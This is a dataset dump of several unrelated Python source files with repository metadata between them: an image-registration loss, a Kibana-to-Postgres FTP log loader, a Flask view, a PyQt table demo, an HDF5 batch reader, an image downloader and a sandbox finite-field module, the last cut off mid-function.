| 37.378049 | 114 | 0.669821 | # Copyright 2019 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
__author__ = "Robin Sandkuehler"
__copyright__ = "Copyright (C) 2019 Center for medical Image Analysis and Navigation"
import torch as th
# Loss base class (standard from PyTorch)
class _PairwiseImageLoss(th.nn.modules.Module):
def __init__(self, fixed_image, moving_image, size_average=True, reduce=True):
super(_PairwiseImageLoss, self).__init__()
self._size_average = size_average
self._reduce = reduce
self.name = "parent"
self._weight = 1
def set_loss_weight(self, weight):
self._weight = weight
# conditional return
def return_loss(self, tensor):
if self._size_average and self._reduce:
return tensor.mean() * self._weight
if not self._size_average and self._reduce:
return tensor.sum() * self._weight
if not self.reduce:
return tensor * self._weight
class MSE(_PairwiseImageLoss):
r""" The mean square error loss is a simple and fast to compute point-wise measure
which is well suited for monomodal image registration.
.. math::
\mathcal{S}_{\text{MSE}} := \frac{1}{\vert \mathcal{X} \vert}\sum_{x\in\mathcal{X}}
\Big(I_M\big(x+f(x)\big) - I_F\big(x\big)\Big)^2
Args:
fixed_image (Image): Fixed image for the registration
moving_image (Image): Moving image for the registration
size_average (bool): Average loss function
reduce (bool): Reduce loss function to a single value
"""
def __init__(self, size_average=True, reduce=True):
super(MSE, self).__init__(size_average, reduce)
self.name = "mse"
def forward(self, displacement, fixed_image, warped_image):
# print("shape", displacement.shape)
mask = th.zeros_like(fixed_image, dtype=th.uint8, device=fixed_image.device)
if displacement.shape[0] > 1:
for dim in range(displacement.size()[-1]):
mask += (displacement[..., dim].gt(1)).unsqueeze(1) + (displacement[..., dim].lt(-1)).unsqueeze(1)
else:
for dim in range(displacement.size()[-1]):
mask += (displacement[..., dim].gt(1)) + (displacement[..., dim].lt(-1))
mask = mask == 0
value_image = (warped_image - fixed_image).pow(2)
value = th.masked_select(value_image, mask)
return self.return_loss(value), value_image
| 1,391 | 26 | 154 |
c4d993b225afa6543ad3c035e2ea0487b8abb0d0 | 6,755 | py | Python | eva-usage-stats/ftp_usage.py | cyenyxe/eva-tools-standalone | 813b219befe19c2609acb6d8def80b6de8f759f3 | [
"Apache-2.0"
] | null | null | null | eva-usage-stats/ftp_usage.py | cyenyxe/eva-tools-standalone | 813b219befe19c2609acb6d8def80b6de8f759f3 | [
"Apache-2.0"
] | null | null | null | eva-usage-stats/ftp_usage.py | cyenyxe/eva-tools-standalone | 813b219befe19c2609acb6d8def80b6de8f759f3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import os
from argparse import ArgumentParser
import psycopg2.extras
import requests
from requests.auth import HTTPBasicAuth
from ebi_eva_common_pyutils.logger import logging_config
from ebi_eva_common_pyutils.metadata_utils import get_metadata_connection_handle
from ebi_eva_common_pyutils.pg_utils import get_all_results_for_query, execute_query
from retry import retry
logger = logging_config.get_logger(__name__)
logging_config.add_stdout_handler()
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
if __name__ == '__main__':
main()
| 43.580645 | 120 | 0.682457 | #!/usr/bin/python
import os
from argparse import ArgumentParser
import psycopg2.extras
import requests
from requests.auth import HTTPBasicAuth
from ebi_eva_common_pyutils.logger import logging_config
from ebi_eva_common_pyutils.metadata_utils import get_metadata_connection_handle
from ebi_eva_common_pyutils.pg_utils import get_all_results_for_query, execute_query
from retry import retry
logger = logging_config.get_logger(__name__)
logging_config.add_stdout_handler()
def create_stats_table(private_config_xml_file, ftp_table_name):
with get_metadata_connection_handle('production_processing', private_config_xml_file) as metadata_connection_handle:
query_create_table = (
f'CREATE TABLE IF NOT EXISTS {ftp_table_name} '
'(_index TEXT, _id TEXT, event_ts_txt TEXT, event_ts TIMESTAMP, host TEXT, uhost TEXT,'
' request_time TEXT, request_year INTEGER, request_ts TIMESTAMP,'
' file_name TEXT, file_size BIGINT, transfer_time INTEGER,'
' transfer_type CHAR, direction CHAR, special_action CHAR(4), access_mode CHAR,'
' country CHAR(2), region TEXT, city TEXT, domain_name TEXT, isp TEXT, usage_type TEXT,'
' primary key(_index, _id))'
)
execute_query(metadata_connection_handle, query_create_table)
def load_batch_to_table(batch, private_config_xml_file, ftp_table_name):
batch = [(h['_index'], h['_id'], h['_source']) for h in batch]
rows = [(
idx,
i, # document ids are unique per index
b['@timestamp'], # event timestamp
b['@timestamp'], # to be converted
b['host'], # webprod host
b['uhost'], # unique user host string
# FTP log fields: see https://docs.oracle.com/cd/E19683-01/817-0667/6mgevq0ee/index.html
b['current_time'],
b['year'],
f"{b['year']} {b['current_time']}", # to be converted
b['file_name'],
b['file_size'],
b['transfer_time'],
b['transfer_type'],
b['direction'],
b['special_action_flag'],
b['access_mode'],
# IP2Location fields: see https://www.ip2location.com/web-service/ip2location
b['ip2location']['country_short'],
b['ip2location']['region'],
b['ip2location']['city'],
b['ip2location']['domain'],
b['ip2location']['isp'],
b['ip2location']['usage_type'],
) for idx, i, b in batch]
with get_metadata_connection_handle('production_processing', private_config_xml_file) as metadata_connection_handle:
with metadata_connection_handle.cursor() as cursor:
query_insert = (
f'INSERT INTO {ftp_table_name} '
'VALUES (%s, %s, %s, cast(%s as timestamp with time zone), %s, %s, %s, %s, '
'cast(%s as timestamp without time zone), %s, %s, %s, %s, %s, %s, '
'%s, %s, %s, %s, %s, %s, %s)'
)
psycopg2.extras.execute_batch(cursor, query_insert, rows)
def get_most_recent_timestamp(private_config_xml_file, ftp_table_name):
with get_metadata_connection_handle('production_processing', private_config_xml_file) as metadata_connection_handle:
results = get_all_results_for_query(
metadata_connection_handle,
f"select max(event_ts_txt) as recent_ts from {ftp_table_name};"
)
if results and results[0][0]:
return results[0][0]
return None
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
def query(kibana_host, basic_auth, private_config_xml_file, batch_size, ftp_table_name):
first_query_url = os.path.join(kibana_host, 'ftplogs*/_search?scroll=24h')
query_conditions = [{'query_string': {'query': 'file_name:("/pub/databases/eva/")'}}]
most_recent_timestamp = get_most_recent_timestamp(private_config_xml_file, ftp_table_name)
if most_recent_timestamp:
query_conditions.append({'range': {'@timestamp': {'gt': most_recent_timestamp}}})
post_query = {
'size': str(batch_size),
'query': {'bool': {'must': query_conditions}}
}
response = requests.post(first_query_url, auth=basic_auth, json=post_query)
response.raise_for_status()
data = response.json()
total = data['hits']['total']
if total == 0:
logger.info('No results found')
return None, None, None
scroll_id = data['_scroll_id']
return scroll_id, total, data['hits']['hits']
@retry(tries=4, delay=2, backoff=1.2, jitter=(1, 3))
def scroll(kibana_host, basic_auth, scroll_id):
query_url = os.path.join(kibana_host, '_search/scroll')
response = requests.post(query_url, auth=basic_auth, json={'scroll': '24h', 'scroll_id': scroll_id})
response.raise_for_status()
data = response.json()
return data['hits']['hits']
def main():
parser = ArgumentParser(description='Retrieves data from Kibana and dumps into a local postgres instance')
parser.add_argument('--kibana-host', help='Kibana host to query, e.g. http://example.ebi.ac.uk:9200', required=True)
parser.add_argument('--kibana-user', help='Kibana API username', required=True)
parser.add_argument('--kibana-pass', help='Kibana API password', required=True)
parser.add_argument('--batch-size', help='Number of records to load at a time', type=int, default=10000)
parser.add_argument('--ftp-table-name', help='Name of stats table to use', default='eva_web_srvc_stats.ftp_traffic')
parser.add_argument('--private-config-xml-file', help='ex: /path/to/eva-maven-settings.xml', required=True)
parser.add_argument('--create-table', help='Whether to create the FTP traffic table',
action='store_true', default=False)
args = parser.parse_args()
kibana_host = args.kibana_host
basic_auth = HTTPBasicAuth(args.kibana_user, args.kibana_pass)
private_config_xml_file = args.private_config_xml_file
batch_size = args.batch_size
ftp_table_name = args.ftp_table_name
if args.create_table:
create_stats_table(private_config_xml_file, ftp_table_name)
loaded_so_far = 0
scroll_id, total, batch = query(kibana_host, basic_auth, private_config_xml_file, batch_size, ftp_table_name)
if not batch:
return
logger.info(f'{total} results found.')
load_batch_to_table(batch, private_config_xml_file, ftp_table_name)
loaded_so_far += len(batch)
while loaded_so_far < total:
logger.info(f'Loaded {loaded_so_far} records...')
batch = scroll(kibana_host, basic_auth, scroll_id)
load_batch_to_table(batch, private_config_xml_file, ftp_table_name)
loaded_so_far += len(batch)
logger.info(f'Done. Loaded {loaded_so_far} total records.')
if __name__ == '__main__':
main()
| 5,991 | 0 | 136 |
7749d6332e7e48b335408d32acd46d623497b9b0 | 1,178 | py | Python | data/bin/cms-trace-merge.py | openalto/network-simulator-data | 09706e5ab6e266ee5ef5b71cd32f10eea5a1975e | [
"MIT"
] | null | null | null | data/bin/cms-trace-merge.py | openalto/network-simulator-data | 09706e5ab6e266ee5ef5b71cd32f10eea5a1975e | [
"MIT"
] | null | null | null | data/bin/cms-trace-merge.py | openalto/network-simulator-data | 09706e5ab6e266ee5ef5b71cd32f10eea5a1975e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import json
if __name__ == '__main__':
import sys
basedir = sys.argv[1]
files, replicas = load_files_replicas(basedir)
files_path = os.path.join(basedir, 'files.json')
with open(files_path, 'w') as ff:
ff.write(json.dumps(files, indent=4, sort_keys=True))
replicas_path = os.path.join(basedir, 'replicas.json')
with open(replicas_path, 'w') as fr:
fr.write(json.dumps(replicas, indent=4, sort_keys=True))
| 31.837838 | 68 | 0.580645 | #!/usr/bin/env python
import os
import json
def load_files_replicas(basedir):
files = []
replicas = []
for d in os.listdir(basedir):
d = os.path.join(basedir, d)
if os.path.isdir(d):
files_path = os.path.join(d, 'files.json')
with open(files_path) as ff:
new_files = json.load(ff)
files.extend(new_files)
for r in os.listdir(d):
if r.startswith('replicas') and r.endswith('.json'):
replicas_path = os.path.join(d, r)
with open(replicas_path) as fr:
new_replicas = json.load(fr)
replicas.extend(new_replicas)
return files, replicas
if __name__ == '__main__':
import sys
basedir = sys.argv[1]
files, replicas = load_files_replicas(basedir)
files_path = os.path.join(basedir, 'files.json')
with open(files_path, 'w') as ff:
ff.write(json.dumps(files, indent=4, sort_keys=True))
replicas_path = os.path.join(basedir, 'replicas.json')
with open(replicas_path, 'w') as fr:
fr.write(json.dumps(replicas, indent=4, sort_keys=True))
| 670 | 0 | 23 |
0e3cbace0e9b47475844b5b00c2e3553be5c9459 | 829 | py | Python | app/user/views.py | ethan-leba/flask-twitter | 27785b88354679d853fe86e6e8629ee72b1d40a4 | [
"MIT"
] | null | null | null | app/user/views.py | ethan-leba/flask-twitter | 27785b88354679d853fe86e6e8629ee72b1d40a4 | [
"MIT"
] | null | null | null | app/user/views.py | ethan-leba/flask-twitter | 27785b88354679d853fe86e6e8629ee72b1d40a4 | [
"MIT"
] | null | null | null | from flask import render_template, url_for, redirect, flash
from flask_login import current_user
from .. import db
from ..models import User, Tweet
from . import user
from .forms import TweetForm
from ..queries import get_all_tweets, send_tweet, get_user
@user.route('/<username>', methods=['GET', 'POST'])
| 37.681818 | 109 | 0.706876 | from flask import render_template, url_for, redirect, flash
from flask_login import current_user
from .. import db
from ..models import User, Tweet
from . import user
from .forms import TweetForm
from ..queries import get_all_tweets, send_tweet, get_user
@user.route('/<username>', methods=['GET', 'POST'])
def user(username):
tweetform = TweetForm()
u = get_user(username)
if u is None:
return abort(404)
elif u == current_user:
if tweetform.validate_on_submit():
send_tweet(tweetform.message.data, u)
return redirect(url_for('user.user', username = u.username))
return render_template('user/myprofile.html.j2',user=u,tweets=get_all_tweets(u), tweetform=tweetform)
else:
return render_template('user/profile.html.j2',user=u, tweets=get_all_tweets(u))
| 499 | 0 | 22 |
a3bc022859e29b21627241b8ca4418a6d0d25fde | 611 | py | Python | setup.py | asdf-format/asdf-chunked | 993c9e7203f9fd0125db79c43e41a3b16169a6c2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asdf-format/asdf-chunked | 993c9e7203f9fd0125db79c43e41a3b16169a6c2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asdf-format/asdf-chunked | 993c9e7203f9fd0125db79c43e41a3b16169a6c2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from pathlib import Path
from setuptools import find_packages, setup
packages = find_packages(where="asdf_chunked")
packages.append("asdf_chunked.resources")
package_dir = {
"": "asdf_chunked",
"asdf_chunked.resources": "resources",
}
package_data = {"asdf_chunked.resources": package_yaml_files("resources")}
setup(
use_scm_version=True,
packages=packages,
package_dir=package_dir,
package_data=package_data,
)
| 21.821429 | 74 | 0.736498 | #!/usr/bin/env python
from pathlib import Path
from setuptools import find_packages, setup
packages = find_packages(where="asdf_chunked")
packages.append("asdf_chunked.resources")
package_dir = {
"": "asdf_chunked",
"asdf_chunked.resources": "resources",
}
def package_yaml_files(directory):
paths = sorted(Path(directory).rglob("*.yaml"))
return [str(p.relative_to(directory)) for p in paths]
package_data = {"asdf_chunked.resources": package_yaml_files("resources")}
setup(
use_scm_version=True,
packages=packages,
package_dir=package_dir,
package_data=package_data,
)
| 123 | 0 | 23 |
ecfe7d6e82aad57a073e0bcca5d4e54e0ca8540e | 2,645 | py | Python | UI_dev/archive/app_dev_final/table.py | nimRobotics/BTP | 2387764fc0c513e37b72b97889b4a1ee09f9014c | [
"MIT"
] | null | null | null | UI_dev/archive/app_dev_final/table.py | nimRobotics/BTP | 2387764fc0c513e37b72b97889b4a1ee09f9014c | [
"MIT"
] | null | null | null | UI_dev/archive/app_dev_final/table.py | nimRobotics/BTP | 2387764fc0c513e37b72b97889b4a1ee09f9014c | [
"MIT"
] | null | null | null | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QAction, QTableWidget,QTableWidgetItem,QVBoxLayout
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
# @pyqtSlot()
# def add_element(self):
# des = "HI"
# price = 10
# self.tableWidget.insertRow(self.items)
# description_item = QTableWidgetItem(des)
# price_item = QTableWidgetItem("{:.2f}".format(float(price)))
# price_item.setTextAlignment(Qt.AlignRight)
# self.tableWidget.setItem(self.items, 0, description_item)
# self.tableWidget.setItem(self.items, 1, price_item)
# self.description.setText("")
# self.price.setText("")
# self.items += 1
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
| 34.802632 | 114 | 0.635161 | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QAction, QTableWidget,QTableWidgetItem,QVBoxLayout
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
class App(QWidget):
def __init__(self):
super().__init__()
self.title = 'PyQt5 table - pythonspot.com'
self.left = 0
self.top = 0
self.width = 300
self.height = 200
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.createTable()
# Add box layout, add table to box layout and add box layout to widget
self.layout = QVBoxLayout()
self.layout.addWidget(self.tableWidget)
self.setLayout(self.layout)
# Show widget
self.show()
def createTable(self):
# Create table
self.tableWidget = QTableWidget()
self.tableWidget.setRowCount(4)
self.tableWidget.setColumnCount(3)
self.tableWidget.setHorizontalHeaderLabels(["x-component", "y-component","z-component"])
self.tableWidget.setVerticalHeaderLabels(["Description", "Price"])
self.tableWidget.setItem(0,0, QTableWidgetItem("as"))
self.tableWidget.setItem(0,1, QTableWidgetItem("Ceddll (1,2)"))
self.tableWidget.setItem(0,2, QTableWidgetItem("Ceddll (1,2)"))
# self.tableWidget.setItem(1,0, QTableWidgetItem("Cesll (2,1)"))
# self.tableWidget.setItem(1,1, QTableWidgetItem("Ced2,2)"))
# self.tableWidget.setItem(2,0, QTableWidgetItem("Ck,1)"))
# self.tableWidget.setItem(2,1, QTableWidgetItem("Cen (3,2)"))
# self.tableWidget.setItem(3,0, QTableWidgetItem(" (4,1)"))
# self.tableWidget.setItem(3,1, QTableWidgetItem("Celdslkjk (4,2)"))
self.tableWidget.move(0,0)
# table selection change
# self.tableWidget.doubleClicked.connect(self.on_click)
# self.fill_table()
# @pyqtSlot()
# def add_element(self):
# des = "HI"
# price = 10
# self.tableWidget.insertRow(self.items)
# description_item = QTableWidgetItem(des)
# price_item = QTableWidgetItem("{:.2f}".format(float(price)))
# price_item.setTextAlignment(Qt.AlignRight)
# self.tableWidget.setItem(self.items, 0, description_item)
# self.tableWidget.setItem(self.items, 1, price_item)
# self.description.setText("")
# self.price.setText("")
# self.items += 1
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
| 1,694 | -2 | 112 |
1d2cae0db33f52060f5c4d93831d43614df1c77a | 3,972 | py | Python | cellDataClass.py | okraus/DeepLoc | ced324ee7dfb7f3965a17cf2a78ccec671fa7991 | [
"BSD-3-Clause"
] | 49 | 2017-04-19T08:29:12.000Z | 2020-10-15T07:27:54.000Z | cellDataClass.py | okraus/DeepLoc | ced324ee7dfb7f3965a17cf2a78ccec671fa7991 | [
"BSD-3-Clause"
] | 6 | 2017-10-04T08:45:44.000Z | 2018-07-26T05:06:31.000Z | cellDataClass.py | okraus/DeepLoc | ced324ee7dfb7f3965a17cf2a78ccec671fa7991 | [
"BSD-3-Clause"
] | 28 | 2017-04-22T06:32:10.000Z | 2020-03-19T12:25:22.000Z | # Copyright (c) 2017, Oren Kraus All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import h5py
import numpy as np
| 41.810526 | 130 | 0.656848 | # Copyright (c) 2017, Oren Kraus All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import h5py
import numpy as np
class Data:
def __init__(self,
folder,
keys2fetch,
batchSize,
):
self.numData = 0
self.batchSize = batchSize
self.folder = folder
self.h5data = h5py.File(self.folder, 'r')
self.keys2fetch = keys2fetch
h5keys = self.h5data.keys()
self.groupedData = {}
for key in keys2fetch: self.groupedData[key] = []
for key in h5keys:
if any(x in key for x in keys2fetch):
curInd = [x in key for x in keys2fetch]
if curInd[0]:
self.numData += len(self.h5data[key])
curKey = keys2fetch[curInd.index(True)]
self.groupedData[curKey].append(int(key[len(curKey):]))
for key in keys2fetch: self.groupedData[key].sort()
self.startInd = 0
self.stopInd = self.numData
self.curInd = self.startInd
assert batchSize<self.numData, "batchSize larger than dataset; batchSize: "+str(batchSize)+" dataSize: "+str(self.numData)
self.h5chunkSize = len(self.h5data[keys2fetch[0] + '1'])
self.keySizes = {}
for key in keys2fetch: self.keySizes[key] = self.h5data[key + '1'].shape[1]
self.returnArrays = {}
for key in keys2fetch:
self.returnArrays[key] = np.zeros((self.batchSize, self.keySizes[key]), dtype=np.float32)
def getBatch(self):
if (self.curInd + self.batchSize) >= self.stopInd:
self.curInd = self.startInd
startDsetNum = self.curInd / self.h5chunkSize + 1
startDsetInd = self.curInd % self.h5chunkSize
endDsetNum = (self.curInd + self.batchSize) / self.h5chunkSize + 1
for key in self.keys2fetch:
curInd = 0
curDset = startDsetNum
curDsetInd = startDsetInd
while curInd < self.batchSize:
dsetShape = self.h5data[key + str(curDset)].shape
self.returnArrays[key][curInd:min(dsetShape[0] - curDsetInd, self.batchSize + curDsetInd), :] = \
self.h5data[key + str(curDset)][curDsetInd:min(dsetShape[0], self.batchSize + curDsetInd), :]
curDset += 1
curDsetInd = 0
curInd += min(dsetShape[0] - curDsetInd, self.batchSize)
self.curInd += self.batchSize
return self.returnArrays
| 2,343 | -10 | 76 |
22575a73bd860dd9485b3daa0bbc132d26217211 | 1,216 | py | Python | 0_Complete_Guide_To_Custom_Object_Detection_Model_With_Yolov5/WebScraping/src/util/image_downloader.py | CertifaiAI/classifai-blogs | 23a3e7f5241c27f74ffeb614cc730f21c35e9e2f | [
"Apache-2.0"
] | 3 | 2021-05-17T01:25:56.000Z | 2021-05-31T01:12:53.000Z | 0_Complete_Guide_To_Custom_Object_Detection_Model_With_Yolov5/WebScraping/src/util/image_downloader.py | CertifaiAI/classifai-blogs | 23a3e7f5241c27f74ffeb614cc730f21c35e9e2f | [
"Apache-2.0"
] | 1 | 2021-08-19T02:50:06.000Z | 2021-08-19T02:50:18.000Z | 0_Complete_Guide_To_Custom_Object_Detection_Model_With_Yolov5/WebScraping/src/util/image_downloader.py | CertifaiAI/classifai-blogs | 23a3e7f5241c27f74ffeb614cc730f21c35e9e2f | [
"Apache-2.0"
] | 2 | 2021-06-09T05:48:59.000Z | 2021-06-10T06:29:53.000Z | from PIL import Image
import requests
from io import BytesIO
import base64
import os
def save_image(src, counter, path):
"""Method for saving a single image"""
cur_dir = os.getcwd()
image_root_path = os.path.join(cur_dir, "images")
if not os.path.isdir(image_root_path):
os.mkdir(image_root_path)
image_path = os.path.join(image_root_path, path)
if not os.path.isdir(image_path):
os.mkdir(image_path)
output_path = os.path.join(image_path,f"{path}_{format(counter, '04d')}.png")
if src.startswith("http"):
try:
response = requests.get(src, timeout=20)
img = Image.open(BytesIO(response.content))
img.save(output_path)
except:
return False
else:
try:
img = Image.open(src)
img.save(output_path)
except:
return False
print(f"Save Image: {output_path}")
return True
def save_images(src_list, path, img_num):
"""Method for saving a list of images"""
counter = 1
for src in src_list:
if counter == img_num + 1:
break
if (save_image(src, counter, path)):
counter += 1
| 24.816327 | 81 | 0.596217 | from PIL import Image
import requests
from io import BytesIO
import base64
import os
def save_image(src, counter, path):
"""Method for saving a single image"""
cur_dir = os.getcwd()
image_root_path = os.path.join(cur_dir, "images")
if not os.path.isdir(image_root_path):
os.mkdir(image_root_path)
image_path = os.path.join(image_root_path, path)
if not os.path.isdir(image_path):
os.mkdir(image_path)
output_path = os.path.join(image_path,f"{path}_{format(counter, '04d')}.png")
if src.startswith("http"):
try:
response = requests.get(src, timeout=20)
img = Image.open(BytesIO(response.content))
img.save(output_path)
except:
return False
else:
try:
img = Image.open(src)
img.save(output_path)
except:
return False
print(f"Save Image: {output_path}")
return True
def save_images(src_list, path, img_num):
"""Method for saving a list of images"""
counter = 1
for src in src_list:
if counter == img_num + 1:
break
if (save_image(src, counter, path)):
counter += 1
| 0 | 0 | 0 |
4f1f7997e4d027884b195e0bb4bf1141ba0efaec | 4,788 | py | Python | sandbox/pyexprfield.py | turkeydonkey/nzmath3 | a48ae9efcf0d9ad1485c2e9863c948a7f1b20311 | [
"BSD-3-Clause"
] | 1 | 2021-05-26T19:22:17.000Z | 2021-05-26T19:22:17.000Z | sandbox/pyexprfield.py | turkeydonkey/nzmath3 | a48ae9efcf0d9ad1485c2e9863c948a7f1b20311 | [
"BSD-3-Clause"
] | null | null | null | sandbox/pyexprfield.py | turkeydonkey/nzmath3 | a48ae9efcf0d9ad1485c2e9863c948a7f1b20311 | [
"BSD-3-Clause"
] | null | null | null | """
Python Expression field, another finite prime field characteristic two definition.
field element is defined by bool(Python Expression).
This module is reference design for finite field characteristic two.
but I recommend that this field should be used only checking Python syntax.
"""
import logging
import operator
_log = logging.getLogger('sandbox.pyexprfield')
import sandbox.finitefield as finitefield
class PythonExpressionFieldElement(finitefield.FiniteFieldElement):
"""
The element of boolean field.
"""
def __init__(self, expression):
""" boolean must be Python expression.
"""
self.boolean = bool(expression)
def xor(self, other):
""" return self xor other .
"""
return self.__class__(not (self == other))
__radd__ = __add__
__sub__ = __add__
__rsub__ = __add__
__rmul__ = __mul__
def __div__(self, other):
""" compute formal division.
In Python expression, 0 is False, so dividing False causes ZeroDivisionerror.
"""
if not other:
raise ZeroDivisionError("False represents zero, this operation is ZeroDivision.")
return self.__class__(self.boolean)
__truediv__ = __div__
__floordiv__ = __div__
__rdiv__ = __div__
__rtruediv__ = __div__
__rfloordiv__ = __div__
__invert__ = __neg__
def toFinitePrimeFieldElement(self):
""" get FinitePrimeField(2) element with bijective map.
"""
if self.boolean:
return finitefield.FinitePrimeFieldElement(1, 2)
return finitefield.FinitePrimeFieldElement(0, 2)
| 28 | 93 | 0.6368 | """
Python Expression field, another finite prime field characteristic two definition.
field element is defined by bool(Python Expression).
This module is reference design for finite field characteristic two.
but I recommend that this field should be used only checking Python syntax.
"""
import logging
import operator
_log = logging.getLogger('sandbox.pyexprfield')
import sandbox.finitefield as finitefield
class PythonExpressionFieldElement(finitefield.FiniteFieldElement):
"""
The element of boolean field.
"""
def __init__(self, expression):
""" boolean must be Python expression.
"""
self.boolean = bool(expression)
def __eq__(self, other):
return self.boolean == other
def getRing(self):
return PythonExpressionField()
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.boolean)
def __str__(self):
return str(self.boolean)
def xor(self, other):
""" return self xor other .
"""
return self.__class__(not (self == other))
def __add__(self, other):
return self.__class__(self.xor(other))
__radd__ = __add__
__sub__ = __add__
__rsub__ = __add__
def __mul__(self, other):
return self.__class__(self.boolean and other)
__rmul__ = __mul__
def __div__(self, other):
""" compute formal division.
In Python expression, 0 is False, so dividing False causes ZeroDivisionerror.
"""
if not other:
raise ZeroDivisionError("False represents zero, this operation is ZeroDivision.")
return self.__class__(self.boolean)
__truediv__ = __div__
__floordiv__ = __div__
__rdiv__ = __div__
__rtruediv__ = __div__
__rfloordiv__ = __div__
def __bool__(self):
return not self.boolean
def __pow__(self, index):
if index == 0:
return self.__class__(True)
return self.__class__(self.boolean)
def __neg__(self):
return self.__class__(not self.boolean)
def __pos__(self):
return self.__class__(self.boolean)
__invert__ = __neg__
def __coerce__(self, other):
return (self, self.__class__(other))
def toFinitePrimeFieldElement(self):
""" get FinitePrimeField(2) element with bijective map.
"""
if self.boolean:
return finitefield.FinitePrimeFieldElement(1, 2)
return finitefield.FinitePrimeFieldElement(0, 2)
class PythonExpressionField(finitefield.FiniteField):
def __init__(self):
characteristic = 2 # BooleanField = {True, False}
finitefield.FiniteField.__init__(self, characteristic)
def __contains__(self, element):
"""Python expressions are either pass or raise SyntaxError.
in other words, always true.
"""
return True
def card(self):
return self.char
def createElement(self, expression):
return PythonExpressionFieldElement(expression)
def order(self, element):
if element:
return 1
raise ValueError("False is zero, not in the group.")
def __repr__(self):
return "%s()" % (self.__class__.__name__)
def __hash__(self):
return self.char & 0xFFFFFFFF
def issubring(self, other):
"""
Report whether another ring contains the field as a subring.
"""
if self == other:
return True
# FIXME: Undefined variable 'FiniteField'
if isinstance(other, FiniteField) and other.getCharacteristic() == self.char:
return True
try:
return other.issuperring(self)
except:
return False
def issuperring(self, other):
"""
Report whether the field is a superring of another ring.
Since the field is a prime field, it can be a superring of
itself only.
"""
if self == other:
return True
# FIXME Undefined variable 'FiniteField'
if isinstance(other, FiniteField) and other.getCharacteristic() == self.char:
return True
return False
def __bool__(self):
return True
# properties
def _getOne(self):
"getter for one"
if self._one is None:
# FIXME: Undefined variable 'PythonExpressionElement'
self._one = PythonExpressionElement(1)
return self._one
one = property(_getOne, None, None, "multiplicative unit.")
def _getZero(self):
"getter for zero"
if self._zero is None:
